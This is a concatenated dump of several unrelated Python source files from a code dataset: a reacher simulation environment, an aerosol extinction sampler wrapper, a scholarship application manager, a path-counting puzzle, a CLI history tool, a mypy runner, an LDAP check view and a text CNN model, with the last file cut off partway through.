implementation here.\n '''\n joint_state, mocap_state = state\n self.sim.set_state(joint_state)\n # mocap_pos, mocap_quat = mocap_state\n # self.data.set_mocap_pos('body0', mocap_pos) # It seems it has no mocap in use\n # self.data.set_mocap_quat('body0', mocap_quat)\n self.sim.forward()\n\n# End Adding interface for multiworld environment collection\n","sub_path":"multiworld/envs/goal_env_ext/reacher/reacher_env.py","file_name":"reacher_env.py","file_ext":"py","file_size_in_byte":9549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313219944","text":"#!/usr/bin/env python3\n\n\"\"\"\n Wrapper for ext_sampler.py\n Gets extinction veritcal profiles and aerosol intensive properties\n Uses trj_sampled files as inputs\n\n adapted from run_lidar_sampler.py\n Patricia Castellanos, Oct, 2019\n\n\"\"\"\n\nimport os\nimport errno\nimport subprocess\nimport argparse\nimport time\nfrom datetime import datetime, timedelta\nfrom dateutil.parser import parse as isoparser\nfrom MAPL import Config\nfrom netCDF4 import Dataset\nimport numpy as np\n\n\n#------------------------------------ M A I N ------------------------------------\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\ndef StartNew(processes,cmds,nextdate,lendate):\n \"\"\" Start a new subprocess if there is work to do \"\"\"\n\n if nextdate < lendate:\n proc = subprocess.Popen(cmds[nextdate], shell=True)\n print(cmds[nextdate])\n nextdate += 1\n processes.append(proc)\n\n return processes,nextdate\n\ndef CheckRunning(processes,cmds,nextdate,lendate,args):\n \"\"\" Check any running processes and start new ones if there are spare slots.\"\"\"\n\n for p in range(len(processes))[::-1]: # Check the processes in reverse order\n if processes[p].poll() is not None: # If the process hasn't finished will return None\n del processes[p] # Remove from list - this is why we needed reverse order\n\n while (len(processes) < args.nproc) and (nextdate < lendate): # More to do and some spare slots\n processes, nextdate = StartNew(processes,cmds,nextdate,lendate)\n\n return processes,nextdate\n\nif __name__ == \"__main__\":\n\n # Defaults\n DT_hours = 1\n nproc = 12\n rcFile = 'Aod_EOS.rc'\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"iso_t1\",\n help=\"starting iso time\")\n parser.add_argument(\"iso_t2\",\n help=\"ending iso time\")\n\n parser.add_argument(\"input\",\n help=\"filename template\")\n\n parser.add_argument(\"output\",\n help=\"filename template\") \n\n parser.add_argument(\"channel\",\n help=\"channel\") \n\n parser.add_argument(\"-D\",\"--DT_hours\", default=DT_hours, type=int,\n help=\"Timestep in hours for each file (default=%i)\"%DT_hours)\n\n parser.add_argument(\"--rc\", default=rcFile,\n help=\"rc File (default=%s)\"%rcFile) \n\n parser.add_argument(\"-v\", \"--verbose\",action=\"store_true\",\n help=\"Verbose mode (default=False).\")\n\n parser.add_argument(\"-r\", \"--dryrun\",action=\"store_true\",\n help=\"do a dry run (default=False).\") \n\n parser.add_argument(\"--coarse\",action=\"store_true\",\n help=\"do coarse mode only (default=False).\")\n\n parser.add_argument(\"--fine\",action=\"store_true\",\n help=\"do fine mode only (default=False).\")\n parser.add_argument(\"--spc\",action=\"store_true\",\n help=\"do indivudual species (default=False).\")\n\n parser.add_argument(\"-n\", \"--nproc\",default=nproc,type=int,\n help=\"Number of processors (default=%i).\"%nproc) \n\n args = parser.parse_args()\n\n ch = args.channel \n enddate = isoparser(args.iso_t2)\n pdf = timedelta(hours=DT_hours)\n\n Date = isoparser(args.iso_t1)\n inFilelist = []\n outFilelist = []\n while Date < enddate:\n YY = Date.strftime('%Y')\n MM = Date.strftime('%m')\n DD = Date.strftime('%d')\n strdate = Date.strftime('%Y%m%d_%H%Mz') \n inFile = args.input.format(YY,MM,DD,strdate)\n outFile = args.output.format(YY,MM,DD,strdate,ch)\n outpath = os.path.dirname(outFile)\n mkdir_p(outpath)\n\n inFilelist.append(inFile)\n outFilelist.append(outFile)\n\n Date += timedelta(hours=args.DT_hours)\n\n # run extinction sampler on model fields\n # split across multiple processors by date\n processes = []\n cmds = []\n for inFile,outFile in zip(inFilelist,outFilelist):\n # all species\n Options = \" --vnames=SS001,SS002,SS003,SS004,SS005,BCPHOBIC,BCPHILIC,OCPHOBIC,OCPHILIC,SO4,DU001,DU002,DU003,DU004,DU005\" + \\\n \" --input=\" + inFile + \\\n \" --output=\" + outFile + \\\n \" --channel=\" + ch + \\\n \" --rc=\" + args.rc + \\\n \" --format=NETCDF4_CLASSIC\" + \\\n \" --intensive\" \n\n if args.verbose:\n Options += \" --verbose\" \n\n cmd = 'ext_sampler.py {} '.format(Options)\n cmds.append(cmd)\n\n if args.spc:\n SPC = {'SU':'SO4',\n 'OC':'OCPHILIC,OCPHOBIC',\n 'BC':'BCPHILIC,BCPHOBIC',\n 'SS':'SS001,SS002,SS003,SS004,SS005',\n 'DU':'DU001,DU002,DU003,DU004,DU005'}\n for spc in SPC:\n for inFile,outFile in zip(inFilelist,outFilelist):\n # all species indivudually \n Options = \" --vnames=\" + SPC[spc] + \\\n \" --input=\" + inFile + \\\n \" --output=\" + outFile[:-4] + \".\"+spc+\".nc4\" + \\\n \" --channel=\" + ch + \\\n \" --rc=\" + args.rc + \\\n \" --format=NETCDF4_CLASSIC\" \n #\" --intensive\"\n\n if args.verbose:\n Options += \" --verbose\"\n\n cmd = 'ext_sampler.py {} '.format(Options)\n cmds.append(cmd)\n\n # coarse mode only\n if args.coarse:\n for inFile,outFile in zip(inFilelist,outFilelist):\n Options = \" --vnames=SS001,SS002,SS003,SS004,SS005,DU001,DU002,DU003,DU004,DU005\" + \\\n \" --input=\" + inFile + \\\n \" --output=\" + outFile[:-4] + \".coarse.nc4\" + \\\n \" --channel=\" + ch + \\\n \" --rc=\" + args.rc + \\\n \" --format=NETCDF4_CLASSIC\" + \\\n \" --intensive\"\n\n if args.verbose:\n Options += \" --verbose\"\n\n cmd = 'ext_sampler.py {} '.format(Options)\n cmds.append(cmd)\n\n # fine mode only\n if args.fine:\n for inFile,outFile in zip(inFilelist,outFilelist):\n Options = \" --vnames=BCPHOBIC,BCPHILIC,OCPHOBIC,OCPHILIC,SO4\" + \\\n \" --input=\" + inFile + \\\n \" --output=\" + outFile[:-4] + \".fine.nc4\" + \\\n \" --channel=\" + ch + \\\n \" --rc=\" + args.rc + \\\n \" --format=NETCDF4_CLASSIC\" + \\\n \" --intensive\"\n\n if args.verbose:\n Options += \" --verbose\"\n\n cmd = 'ext_sampler.py {} '.format(Options)\n cmds.append(cmd)\n\n lendate = len(cmds)\n # Manage processes\n # This will start the max processes running \n if not args.dryrun:\n processes, nextdate = CheckRunning(processes,cmds,0,lendate,args)\n while len(processes)>0: # Some things still going on\n time.sleep(10) # Wait\n # add more processes as other ones finish\n processes, nextdate = CheckRunning(processes,cmds,nextdate,lendate,args)\n else:\n for cmd in cmds:\n print(cmd)\n\n","sub_path":"src/Components/rtms/leo_vlidort/run_ext_sampler.py","file_name":"run_ext_sampler.py","file_ext":"py","file_size_in_byte":7728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"331232159","text":"from google.appengine.ext.db import BadValueError\nfrom scholarships.models import ScholarshipApplication, Scholarship\nfrom google.appengine.api import mail\nimport traceback\nimport logging\n\nfrom datetime import datetime, timedelta\n\nclass ScholarshipManager(object):\n def __init__(self, result=None):\n self.result = result\n\n def get(self, name):\n scholarship = Scholarship.query()\\\n .filter(Scholarship.name == name)\\\n .get()\n\n if scholarship is None:\n now = datetime.now()\n s_date = now - timedelta(days=5)\n e_date = now + timedelta(days=5)\n\n scholarship = Scholarship(name=name, start_date=s_date, end_date=e_date)\n scholarship.put()\n\n if scholarship is None:\n code = 'There are no scholarships available at this time.'\n self.result.add_error(code)\n return None\n\n if self.result:\n info = 'This scholarship application will be open from {0} to {1}'\n self.result.add_info(info.format(scholarship.start_date.strftime(\"%m/%d/%y\"), scholarship.end_date.strftime(\"%m/%d/%y\")))\n\n valid = scholarship.validate(self.result)\n return scholarship if valid else None\n\n\n def add(self, scholarship, data):\n application = ScholarshipApplication(parent=scholarship.key)\n\n del data['csrfmiddlewaretoken']\n\n #application.save(**data)\n try:\n application.populate(**data)\n application.put()\n except BadValueError as bve:\n field_name = bve.message.split(': ')[1]\n msg = 'The value for the field \"{0}\" is required.'.format(field_name)\n self.result.add_error(msg)\n return application\n except TypeError as te:\n self.result.add_error(te.message)\n return application\n\n self.send_email(application)\n\n return application\n\n def resend(self, scholarship, email):\n app = ScholarshipApplication\\\n .query(ancestor=scholarship.key)\\\n .filter(ScholarshipApplication.email == email)\\\n .get()\n\n if app is None:\n pass\n\n self.send_email(app)\n return app\n\n\n def get_current_applications(self):\n applications = ScholarshipApplication.query().fetch(100)\n return applications\n\n\n def get_default(self):\n return ScholarshipApplication()\n\n\n def send_email(self, application):\n email_manager = EmailManager()\n\n try:\n email_manager.send_confirmation(application.name, application.email)\n # email_manager.send_full_notification('pedro.diaz.vargas@gmail.com', application)\n email_manager.send_full_notification('Alejandro_Carrascal@oxy.com', application)\n except:\n email_manager.send_confirmation('Pedro', 'pedro.diaz.vargas@gmail.com')\n stacktrace = traceback.format_exc()\n logging.error('%s', stacktrace)\n\n\nclass EmailManager(object):\n fields = ('essay','name','phone','email','address','currentMajor','previousMajor','citizenship','colsaMember','testName','testPercent','overallGpa','currentGpa','standing','tuitionWaiver','employeer','workHours','carCost','dependents','employedOnCampus','additionalAid','colsaContributions','colsaHours','colsaStartDate','honors','publications','studentId','expectedGraduationDate',)\n\n def send_confirmation(self, name, email):\n\n message = mail.EmailMessage(sender=\"colouaa@gmail.com\",\n subject=\"Your scholarship application has been received\")\n\n message.to = email\n message.body = \"\"\"\n Dear {0}:\n\n Your scholarship application has been successfully received.\n We will announce the winners of this year's scholarships during the colombian night.\n\n If you have any questions please contact Yoana Walschap: ywalschap@ou.edu\n \"\"\".format(name)\n\n message.send()\n\n\n def send_notification(self, admin, applicant_name, applicant_email):\n message = mail.EmailMessage(sender=\"colouaa@gmail.com\",\n subject=\"New Scholarship Application\")\n\n message.to = admin\n message.body = \"\"\"\n We have received a new scholarship application for {0}: {1}\n \"\"\".format(applicant_name, applicant_email)\n\n message.send()\n\n\n def send_full_notification(self, admin, application):\n message = mail.EmailMessage(sender=\"colouaa@gmail.com\",\n subject=\"New Scholarship Application\")\n\n message.to = admin\n message.html = self.get_body(application)\n\n message.send()\n\n\n def get_body(self, application):\n fields = application.to_dict()\n\n prefix = ['', '']\n postfix = ['', '
']\n\n pattern = '{0}{1}'\n body = [pattern.format(field, self.getField(fields, field)) for field in fields]\n\n return ''.join(prefix + body + postfix)\n\n def getField(self, set, key):\n if key in set:\n return set[key].encode('utf8')\n\n return ''\n\n","sub_path":"scholarships/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"297220765","text":"\"\"\"\nA ball is dropped into a special Galton board where at each level in the board the ball can only move right or down.\nGiven that the Galton board has M rows and N columns, return the total number of unique ways the ball can arrive at\nthe bottom right cell of the Galton board.\n\nEx: Given the following values of M and N…\n\nM = 2, N = 2, return 2.\nThe possible paths are DOWN -> RIGHT and RIGHT -> DOWN\nEx: Given the following values of M and N…\n\nM = 4, N = 3, return 10.\n\"\"\"\n\n\ndef number_of_unique_ways(M: int, N: int):\n if not M and not N:\n return 0\n if M == 1 and N == 1:\n return 1\n stack = [(0, 0)]\n ways = 0\n\n while stack:\n x, y = stack.pop()\n if x == N - 1 and y == -(M - 1):\n ways += 1\n else:\n directions = [(x+1, y), (x, y-1)]\n for new_x, new_y in directions:\n if 0 <= x <= N - 1 and -(M - 1) <= y <= 0:\n stack.append((new_x, new_y))\n return ways\n\n\ndef unique_ways_faster(M: int, N: int) -> int:\n if not M and not N:\n return 0\n if M == 1 and N == 1:\n return 1\n\n ways = [[0 for _ in range(N)] for _ in range(M)]\n\n for i in range(M):\n for j in range(N):\n ways[i][0] = 1\n ways[0][j] = 1\n for i in range(1, M):\n for j in range(1, N):\n ways[i][j] = ways[i-1][j] + ways[i][j-1]\n return ways[-1][-1]\n\n\nprint(number_of_unique_ways(2, 2))\nprint(number_of_unique_ways(4, 3))\nprint(unique_ways_faster(4, 3))","sub_path":"google/galton_board.py","file_name":"galton_board.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"18337128","text":"from CommandData import CommandData\nfrom History import History\nfrom Globals import numStackSlots, numSlots\n\n# TODO: If help flag is set, call the corresponding command help function\n\ndef isValidSlotIndex(slot: int) -> bool:\n return slot >= 0 and slot < numSlots\n\ndef isValidStackSlotIndex(slot: int) -> bool:\n return slot >= 0 and slot < numStackSlots\n\ndef printTop(data):\n print(data.stackSlots[0])\n\ndef clear(commandInfo: CommandData):\n with History() as data:\n if commandInfo.allFlag:\n data.clearDefaultSlot()\n data.stackSlots.clear()\n data.slots.clear()\n print(\"Cleared slots, default space, and stack\")\n else:\n if (commandInfo.slotsFlag):\n if commandInfo.slot is None:\n data.slots.clear()\n print(\"Cleared all slots\")\n elif isValidSlotIndex(commandInfo.slot):\n data.clearSlot(commandInfo.slot)\n print(\"Cleared slot\", commandInfo.slot)\n else:\n print(\"Slot must be between 0 and\", numSlots - 1)\n elif commandInfo.stackFlag:\n data.stackSlots.clear()\n print(\"Cleared stack\")\n else:\n data.clearDefaultSlot()\n print(\"Cleared default space\")\n\ndef pop(commandInfo: CommandData):\n with History() as data:\n mostRecentStackSlot = data.popStackSlot()\n print(mostRecentStackSlot)\n\ndef push(commandInfo: CommandData):\n with History() as data:\n if commandInfo.branchFlag:\n data.pushStackSlot(commandInfo.branch)\n print(\"Branch\", commandInfo.branch, \"saved to top of stack\")\n else:\n data.pushStackSlot(commandInfo.directory)\n print(\"Directory\", commandInfo.directory, \"saved to top of stack\")\n\ndef save(commandInfo: CommandData):\n with History() as data:\n if commandInfo.slot is None:\n if commandInfo.branchFlag:\n data.defaultSlot = commandInfo.branch\n print(\"Branch\", commandInfo.branch, \"saved to the default space\")\n else:\n data.defaultSlot = commandInfo.directory\n print(\"Directory\", commandInfo.directory, \"saved to the default space\")\n elif isValidSlotIndex(commandInfo.slot):\n if commandInfo.branchFlag:\n data.slots[commandInfo.slot] = commandInfo.branch\n print(\"Branch\", commandInfo.branch, \"saved to save slot\", commandInfo.slot)\n else:\n data.slots[commandInfo.slot] = commandInfo.directory\n print(\"Directory\", commandInfo.directory, \"saved to save slot\", commandInfo.slot)\n else:\n print(\"Slot must be between 0 and\", numSlots - 1)\n\ndef show(commandInfo: CommandData):\n with History() as data:\n if commandInfo.allFlag:\n print(\"---Default Slot---\")\n print(data.defaultSlotString())\n print(\"\\n\\n---Slots---\")\n print(data.allSlotsAsString())\n print(\"\\n\\n---Stack---\")\n print(data.allStackSlotsAsString())\n else:\n if commandInfo.stackFlag:\n if commandInfo.topFlag:\n printTop(data)\n elif not commandInfo.slot is None and isValidStackSlotIndex(commandInfo.slot):\n print(data.stackSlots[commandInfo.slot])\n else:\n print(data.allStackSlotsAsString())\n elif commandInfo.slotsFlag:\n if commandInfo.slot is None:\n print(data.allSlotsAsString())\n else:\n if isValidSlotIndex(commandInfo.slot):\n print(data.slots[commandInfo.slot])\n else:\n print(\"Slot must be between 0 and\", numSlots - 1)\n else:\n print(data.defaultSlot)\n\ndef top(commandInfo: CommandData):\n with History() as data:\n printTop(data)","sub_path":"ArgFunctions.py","file_name":"ArgFunctions.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"349958315","text":"# coding=utf-8\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport hashlib\n\nimport os\nimport shlex\n\nfrom subprocess import Popen, PIPE\n\nfrom typing import Optional, Tuple\n\nfrom mypytools.config import config\n\n\nSTRICT_OPTIONAL_DIRS = [os.path.join(config['root_dir'], d['path']) for d in config['src_dirs'] if d.get('strict_optional')]\n\n\nclass MypyTask(object):\n def __init__(self, filename):\n # type: (str) -> None\n self.filename = filename\n self._proc = None # type: Optional[Popen]\n\n def _should_use_strict_optional(self, path):\n # type: (str) -> bool\n for strict_path in STRICT_OPTIONAL_DIRS:\n if path.startswith(strict_path):\n return True\n return False\n\n def _get_file_hash(self):\n # type: () -> str\n with open(self.filename, 'rb') as f:\n return hashlib.md5(f.read()).hexdigest()\n\n def execute(self):\n # type: () -> Tuple[str, str]\n mypy_path = os.pathsep.join(os.path.join(config['root_dir'], path) for path in config.get('mypy_path', []))\n flags = ' '.join(config.get('global_flags', []))\n strict_optional = '--strict-optional' if self._should_use_strict_optional(self.filename) else ''\n cmd = shlex.split(\"/usr/local/bin/mypy {} {} {}\".format(flags, strict_optional, self.filename))\n try:\n before_file_hash = self._get_file_hash()\n after_file_hash = ''\n out = ''\n exit_code = 0\n while before_file_hash != after_file_hash:\n before_file_hash = after_file_hash\n self._proc = Popen(cmd, stdout=PIPE, stderr=PIPE, env={'MYPY_PATH': mypy_path})\n out, err = self._proc.communicate()\n exit_code = self._proc.wait()\n # This still has an ABA problem, but ¯\\_(ツ)_/¯\n after_file_hash = self._get_file_hash()\n return ('', before_file_hash) if exit_code == 0 else (out, before_file_hash)\n except Exception as e:\n print(e)\n return '', ''\n finally:\n self._proc = None\n\n def interrupt(self):\n # type: () -> None\n if self._proc is None:\n return\n try:\n # There's a race between interrupting the stored process and\n # the process exiting. If the process exits first then killing\n # it will throw an OSError, so just swallow that and keep going.\n self._proc.kill()\n except OSError:\n pass\n\n def __eq__(self, other):\n # type: (object) -> bool\n if not isinstance(other, MypyTask):\n raise NotImplemented\n return self.filename == other.filename\n\n def __hash__(self):\n # type: () -> int\n return self.filename.__hash__()\n\n","sub_path":"mypytools/server/mypy_task.py","file_name":"mypy_task.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"194735801","text":"##############################################################################\n#\n# Copyright (c) 2004 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"View Class for the Container's Contents view.\n\n$Id$\n\"\"\"\n\nfrom zope.exceptions import NotFoundError\n\nfrom zope.app import zapi\nfrom zope.app.size.interfaces import ISized\nfrom zope.app.pagetemplate.viewpagetemplatefile import ViewPageTemplateFile\nfrom zope.app.publisher.browser import BrowserView\nfrom zope.app.i18n import ZopeMessageIDFactory as _\n\nfrom ldapauth.interfaces import ILDAPBasedPrincipalSource\nfrom ldapauth.interfaces import ICheckLDAPAdapter\n\n\n\nclass CheckLDAPView(BrowserView):\n\n __used_for__ = ILDAPBasedPrincipalSource\n\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n self.__parent__ = context\n self.report = []\n\n def getHostInfo(self):\n \"\"\"Returns a dict with host information.\"\"\"\n infoDict = {}\n infoDict['host'] = self.context.host\n infoDict['port'] = self.context.port\n infoDict['basedn'] = self.context.basedn\n infoDict['login_attribute'] = self.context.login_attribute\n infoDict['manager_dn'] = self.context.manager_dn\n return infoDict\n\n\n def checkConnection(self):\n \"\"\"Check connetction to the given LDAP server.\"\"\"\n runtest = self.request.get('runtest', None)\n if runtest == \"Run\":\n un = self.request.get('username')\n pw = self.request.get('password')\n \n # get the ldapauth source\n testadapter = ICheckLDAPAdapter(self.context)\n\n # test the connection to the LDAP server\n self._addInfo(\"Test python connection and LDAP server binding\")\n self.report = self.report + testadapter.testConnection()\n self._addInfo(\" \")\n\n # test quering the LDAP server\n self._addInfo(\"Test get principals\")\n self.report = self.report + testadapter.testGetPrincipals(un)\n self._addInfo(\" \")\n\n # test query the given username\n\n # test authenticate the given username\n\n self._addInfo(\"... more test\")\n \n return self.report\n else:\n return \"\"\n\n def _addInfo(self, res):\n \"\"\"Add traceback info to the report list\"\"\"\n self.report.append(res)\n\n check = ViewPageTemplateFile('check.pt')\n","sub_path":"ldapauth/trunk/browser/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413640581","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright 2018 NAVER Corp.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and\nassociated documentation files (the \"Software\"), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished to do so, subject to\nthe following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial\nportions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,\nINCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\nPARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\nHOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF\nCONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\n\nimport argparse\nimport math\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\nimport nsml\nfrom nsml import DATASET_PATH, HAS_DATASET, IS_ON_NSML\nfrom dataset import KinQueryDataset, preprocess\n\n\nhe_normal = tf.contrib.layers.variance_scaling_initializer(factor=1., mode='FAN_AVG', uniform=True)\nregularizer = tf.contrib.layers.l2_regularizer(1e-4)\n\n\n# DONOTCHANGE: They are reserved for nsml\n# This is for nsml leaderboard\ndef bind_model(sess, config):\n # 학습한 모델을 저장하는 함수입니다.\n def save(dir_name, *args):\n # directory\n os.makedirs(dir_name, exist_ok=True)\n saver = tf.train.Saver()\n saver.save(sess, os.path.join(dir_name, 'model'))\n\n # 저장한 모델을 불러올 수 있는 함수입니다.\n def load(dir_name, *args):\n saver = tf.train.Saver()\n # find checkpoint\n ckpt = tf.train.get_checkpoint_state(dir_name)\n if ckpt and ckpt.model_checkpoint_path:\n checkpoint = os.path.basename(ckpt.model_checkpoint_path)\n saver.restore(sess, os.path.join(dir_name, checkpoint))\n else:\n raise NotImplemented('No checkpoint!')\n print('Model loaded')\n\n def infer(raw_data, **kwargs):\n \"\"\"\n :param raw_data: raw input (여기서는 문자열)을 입력받습니다\n :param kwargs:\n :return:\n \"\"\"\n # dataset.py에서 작성한 preprocess 함수를 호출하여, 문자열을 벡터로 변환합니다\n preprocessed_data = preprocess(raw_data, config.strmaxlen)\n # 저장한 모델에 입력값을 넣고 prediction 결과를 리턴받습니다\n pred = sess.run(prob, feed_dict={x: preprocessed_data, is_train: False})\n clipped = np.array(pred > config.threshold, dtype=np.int)\n # DONOTCHANGE: They are reserved for nsml\n # 리턴 결과는 [(확률, 0 or 1)] 의 형태로 보내야만 리더보드에 올릴 수 있습니다. 리더보드 결과에 확률의 값은 영향을 미치지 않습니다\n return list(zip(pred.flatten(), clipped.flatten()))\n\n # DONOTCHANGE: They are reserved for nsml\n # nsml에서 지정한 함수에 접근할 수 있도록 하는 함수입니다.\n nsml.bind(save=save, load=load, infer=infer)\n\n\ndef _batch_loader(iterable, n=1):\n length = len(iterable)\n for n_idx in range(0, length, n):\n yield iterable[n_idx:min(n_idx + n, length)]\n\n\ndef Convolutional_Block(inputs, shortcut, num_filters, name, is_training):\n with tf.variable_scope(\"conv_block_\" + str(num_filters) + \"_\" + name):\n for i in range(2):\n with tf.variable_scope(\"conv1d_%s\" % str(i)):\n filter_shape = [3, inputs.get_shape()[2], num_filters]\n W = tf.get_variable(name='W', shape=filter_shape,\n initializer=he_normal,\n regularizer=regularizer)\n inputs = tf.nn.conv1d(inputs, W, stride=1, padding=\"SAME\")\n inputs = tf.layers.batch_normalization(inputs=inputs, momentum=0.9, epsilon=1e-5,\n center=True, scale=True, training=is_training)\n inputs = tf.nn.relu(inputs)\n\n if shortcut is not None:\n return inputs + shortcut\n\n return inputs\n\n\ndef downsampling(inputs, downsampling_type, name, optional_shortcut=False, shortcut=None):\n if downsampling_type == 'k-maxpool':\n k = math.ceil(int(inputs.get_shape()[1]) / 2)\n pool = tf.nn.top_k(tf.transpose(inputs, [0, 2, 1]), k=k, name=name, sorted=False)[0]\n pool = tf.transpose(pool, [0, 2, 1])\n elif downsampling_type == 'linear':\n pool = tf.layers.conv1d(inputs=inputs, filters=inputs.get_shape()[2], kernel_size=3,\n strides=2, padding='same', use_bias=False)\n else: # best\n pool = tf.layers.max_pooling1d(inputs=inputs, pool_size=3, strides=2, padding='same', name=name)\n\n if optional_shortcut:\n shortcut = tf.layers.conv1d(inputs=shortcut, filters=shortcut.get_shape()[2], kernel_size=1,\n strides=2, padding='same', use_bias=False)\n pool += shortcut\n\n pool = fixed_padding(inputs=pool)\n return tf.layers.conv1d(inputs=pool, filters=pool.get_shape()[2] * 2, kernel_size=1,\n strides=1, padding='valid', use_bias=False)\n\n\ndef fixed_padding(inputs, kernel_size=3):\n pad_total = kernel_size - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n padded_inputs = tf.pad(inputs, [[0, 0], [pad_beg, pad_end], [0, 0]])\n return padded_inputs\n\n\nclass TextCNN(object):\n def __init__(self, num_classes=1, sequence_max_length=1012, vocab_size=251, embedding_size=16,\n depth=29, downsampling_type='maxpool', optional_shortcut=True, lr=1e-3, fc_units=2048):\n\n self.input_x = tf.placeholder(tf.int32, [None, sequence_max_length], name=\"input_x\")\n self.input_y = tf.placeholder(tf.float32, [None, num_classes], name=\"input_y\")\n self.is_training = tf.placeholder(tf.bool, name='is_training')\n\n if depth == 9:\n num_layers = [2, 2, 2, 2]\n elif depth == 17:\n num_layers = [4, 4, 4, 4]\n elif depth == 29: # best\n num_layers = [10, 10, 4, 4]\n elif depth == 49: # not good\n num_layers = [16, 16, 10, 6]\n else:\n raise NotImplementedError\n\n with tf.name_scope(\"embedding\"):\n # self.W = tf.Variable(tf.random_uniform([vocab_size, embedding_size], -1., 1.), name=\"W\")\n self.W = tf.get_variable('lookup-W', shape=[vocab_size, embedding_size],\n initializer=he_normal)\n self.embedded_chars = tf.nn.embedding_lookup(self.W, self.input_x)\n\n self.layers = []\n\n with tf.variable_scope('temp-conv'):\n filter_shape = [3, embedding_size, 64]\n W = tf.get_variable(name='W_1', shape=filter_shape,\n initializer=he_normal,\n regularizer=regularizer)\n inputs = tf.nn.conv1d(self.embedded_chars, W, stride=1, padding=\"SAME\")\n\n self.layers.append(inputs)\n\n for i in range(num_layers[0]):\n if i < num_layers[0] - 1 and optional_shortcut:\n shortcut = self.layers[-1]\n else:\n shortcut = None\n conv_block = Convolutional_Block(inputs=self.layers[-1], shortcut=shortcut, num_filters=64,\n is_training=self.is_training, name=str(i + 1))\n self.layers.append(conv_block)\n pool1 = downsampling(self.layers[-1], downsampling_type=downsampling_type, name='pool1',\n optional_shortcut=optional_shortcut, shortcut=self.layers[-2])\n self.layers.append(pool1)\n\n for i in range(num_layers[1]):\n if i < num_layers[1] - 1 and optional_shortcut:\n shortcut = self.layers[-1]\n else:\n shortcut = None\n conv_block = Convolutional_Block(inputs=self.layers[-1], shortcut=shortcut, num_filters=128,\n is_training=self.is_training, name=str(i + 1))\n self.layers.append(conv_block)\n pool2 = downsampling(self.layers[-1], downsampling_type=downsampling_type, name='pool2',\n optional_shortcut=optional_shortcut, shortcut=self.layers[-2])\n self.layers.append(pool2)\n\n for i in range(num_layers[2]):\n if i < num_layers[2] - 1 and optional_shortcut:\n shortcut = self.layers[-1]\n else:\n shortcut = None\n conv_block = Convolutional_Block(inputs=self.layers[-1], shortcut=shortcut, num_filters=256,\n is_training=self.is_training, name=str(i + 1))\n self.layers.append(conv_block)\n pool3 = downsampling(self.layers[-1], downsampling_type=downsampling_type, name='pool3',\n optional_shortcut=optional_shortcut, shortcut=self.layers[-2])\n self.layers.append(pool3)\n\n for i in range(num_layers[3]):\n if i < num_layers[3] - 1 and optional_shortcut:\n shortcut = self.layers[-1]\n else:\n shortcut = None\n conv_block = Convolutional_Block(inputs=self.layers[-1], shortcut=shortcut, num_filters=512,\n is_training=self.is_training, name=str(i + 1))\n self.layers.append(conv_block)\n\n # Extract 8 most features as mentioned in paper\n self.k_pooled = tf.nn.top_k(tf.transpose(self.layers[-1], [0, 2, 1]), k=8, name='k_pool', sorted=False)[0]\n\n self.flatten = tf.layers.flatten(self.k_pooled) # tf.reshape(self.k_pooled, (-1, 512 * 8))\n\n # Final (un-normalized) scores and predictions\n with tf.variable_scope('fc1'):\n w = tf.get_variable('w', [self.flatten.get_shape()[1], fc_units],\n initializer=he_normal, regularizer=regularizer)\n b = tf.get_variable('b', [fc_units], initializer=tf.constant_initializer(.1))\n out = tf.matmul(self.flatten, w) + b\n self.fc1 = tf.nn.relu(out)\n\n # fc2\n with tf.variable_scope('fc2'):\n w = tf.get_variable('w', [self.fc1.get_shape()[1], num_classes],\n initializer=he_normal, regularizer=regularizer)\n b = tf.get_variable('b', [num_classes], initializer=tf.constant_initializer(.1))\n\n self.scores = 